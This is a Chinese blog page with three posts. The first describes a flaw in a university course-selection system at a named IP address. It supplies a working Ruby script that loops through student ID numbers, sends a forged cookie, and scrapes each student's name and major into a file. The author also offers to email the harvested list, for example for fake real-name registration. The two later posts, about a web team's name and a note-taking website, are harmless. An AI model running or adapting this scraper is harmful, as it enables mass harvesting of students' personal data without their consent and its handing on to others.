华师网站漏洞报告:选课系统

漏洞地址:http://218.199.196.57/scripts/init
漏洞描述:输入学号即可得到姓名与专业
 
其实这个也算不上什么漏洞,只是设计者脑子进水了而已,这样的一来谁都可以拿到一份全华师本科生的 学号-姓名-专业 对照表
如果要从官方途径拿这个表可是要费些功夫的 而且据说12级的他们还怎么都不给是吧
那么就只能赞扬选课系统设计者的开源精神咯
写脚本 收走:

#华师选课系统漏洞利用 Ruby 版本
# encoding: utf-8
require ‘net/http’
require ‘uri’
require “iconv”
2012210001.upto(2012214600){|num|
uri = URI.parse(“http://218.199.196.57/scripts/init”)
req = Net::HTTP::Post.new(uri.path)
req.set_form_data(‘strVerify’ => ‘false’, ‘strUser’ => “#{num}”)
req.add_field(‘Cookie’, ‘iscookies=y; domain=218.199.196.57; path=/; expires=Sun, 30 Dec 2012 23:50:49 GMT’)
res = Net::HTTP.start(uri.host, uri.port) do |http|
http.request(req)
end
conv = Iconv.new(“utf-8”, “GBK”)
regex = /姓名.*<\/font>/
result = regex.match(conv.iconv(res.body)).to_s
if result.length != 0
#puts result[0,result.length-7]
fh = File.open(“2009.txt”, “a”)
fh.puts “#{num} ” << result[0,result.length-7]
fh.close
puts “#{num} OK!”
else
fh = File.open(“temp.txt”, “a”)
fh.puts “#{num} not exist!”
fh.close
puts “#{num} not find!”
end
}

这个页面访问会验证cookie是否可用,所以请求的时候带上个?iscookies=y?的 cookie 就好了
不想自己的采又正好需要一份的(比如做网站需要伪实名的),mail 我也阔以 =。=

轻舞飞扬工作室~Let's fly

通过相当于没有的面试,我进入了网络教育与技术中心的网站制作小组。进组群的时候发现这个小组有和自己别样的名称——轻舞飞扬。
对某些weber(webeditor & webmaster)来说,轻舞飞扬是一个神奇的词语,或者说ID。在BBS的那个时代,身边的人还在背着大人找秘密基地的时候,有一部分人就已经“巧妙”的完成了这个壮举,安家落户般成为“网民”。
痞子蔡和轻舞飞扬的故事,咖啡与水的哲学,香水中起舞的蝴蝶——是否成就了那个时代我不知道——但他一定让很多颗心都中了一箭。
不知道那些不知道缘由的人如何看待这个名称,又倘若了解到了,会不会也有心灵的悸动?
我喜欢这个团队,与人无关,只是这个名称就够了。我还想帮主这个团队走向胜利,就如它的名称希望,轻舞飞扬!

[分享]Lino

 

这个关于墙贴的站点不错。

今天我淡定的装着我的PHP,装着装着,冒出了一个新奇的想法——这类想法大家都会经常有——但如果不记下来,过几天就忘了,就仿佛从来没发生过一样,我觉得这很损失。我在想着有没有一个什么东西能够让人用手机把一闪念的东西方便的记下来,类似于网络便笺类的——手机上那个记事本和备忘录其实并不方便——因为它是死的,无法跟网络贯通,况且一旦手机丢了,就什么都没了。

后来我就在搜索关键词:便笺,结果就找到这样一个站点:http://www.linoit.com。虽然与我的要求不是太符,但研究来研究去,发现这东西挺不错的。可以贴图片,可以贴视频,而且还有一个提醒任务的功能,类似于Rememberthemilk.com,但这个更直观。

想到《越狱》里迈克在入狱前研究越狱计划时,贴满墙壁的线索,觉得这个网站可能就是受迈克的启发吧?如果你有一个一下子理不清的更宏大的计划,不妨用用这个站点。